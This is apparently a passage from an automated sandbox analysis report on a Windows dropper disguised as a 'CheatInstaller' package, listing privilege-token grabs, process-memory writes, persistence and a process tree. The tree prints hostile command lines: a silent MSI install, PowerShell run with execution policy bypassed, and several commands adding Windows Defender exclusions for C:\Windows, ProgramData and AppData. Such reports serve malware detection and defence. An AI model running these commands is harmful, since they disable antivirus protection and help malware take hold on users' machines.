N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5076 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe
PID 5076 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe
PID 5076 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe
PID 2964 wrote to memory of 2168 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 2168 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 2168 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5084 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 5084 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 5084 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 2964 wrote to memory of 1420 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 1420 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 1420 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1420 wrote to memory of 3456 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 3456 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4040 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3456 wrote to memory of 4040 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4040 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2964 wrote to memory of 1824 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 1824 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2964 wrote to memory of 1824 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4040 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3132 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1516 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3128 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1488 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2564 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3204 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4040 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A60F9EDE4F4A9FDE9C5AFD3C79CC5E1F C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710551130 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9E0D76424B3DB3F93E35D4CFEDAEDFD5

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7D12.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7D00.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7D01.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7D02.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 63CC88E602DA9D83F79B646C51C264E6 E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI22CA.tmp

"C:\Windows\Installer\MSI22CA.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss22CD.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi22CA.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr22CB.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr22CC.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\23B0.tmp\23B1.tmp\23B2.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

